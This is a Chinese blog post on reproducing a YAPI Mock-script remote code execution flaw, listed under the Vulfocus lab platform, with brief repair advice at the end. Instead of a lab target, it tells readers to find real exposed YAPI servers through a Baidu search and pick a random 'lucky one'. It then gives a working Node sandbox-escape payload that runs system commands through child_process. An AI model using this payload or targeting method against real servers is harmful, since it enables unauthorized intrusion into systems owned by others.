Vulfocus 【YAPI】漏洞复现

admin

2021 年 12 月 15 日

1441 次浏览

1 条评论

1344字数

Linux Java 网络安全 Vulfocus

## 寻找安装了YAPI的服务器

---

百度搜索关键词为 `YApi-高效、易用、功能强大的可视化接口管理平台`

![image.png](https://ronins.cn/usr/uploads/2021/12/667095533.png)

**<div class="tip inlineBlock info">

让我们随机选取一名幸运儿练手
</div>**

### **注册YAPI账号**

![image.png](https://ronins.cn/usr/uploads/2021/12/2133480950.png)

## 准备攻击

### 新建项目

![image.png](https://ronins.cn/usr/uploads/2021/12/3075099636.png)

![image.png](https://ronins.cn/usr/uploads/2021/12/244771668.png)

### 新建接口

![image.png](https://ronins.cn/usr/uploads/2021/12/1320202390.png)

### 点击提交进行提交

![image.png](https://ronins.cn/usr/uploads/2021/12/3909379423.png)

### 利用Mock进行攻击

![image.png](https://ronins.cn/usr/uploads/2021/12/3889597196.png)

![image.png](https://ronins.cn/usr/uploads/2021/12/1607591092.png)

![image.png](https://ronins.cn/usr/uploads/2021/12/184417289.png)

```bash
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()
```

![image.png](https://ronins.cn/usr/uploads/2021/12/3234683920.png)

![image.png](https://ronins.cn/usr/uploads/2021/12/2239113707.png)

## 修复建议

1.关闭YAPI注册功能
2.删除恶意账户
3.回滚服务器快照
4.同步删除恶意mock脚本以防止二次攻击

最后修改：2023 年 03 月 26 日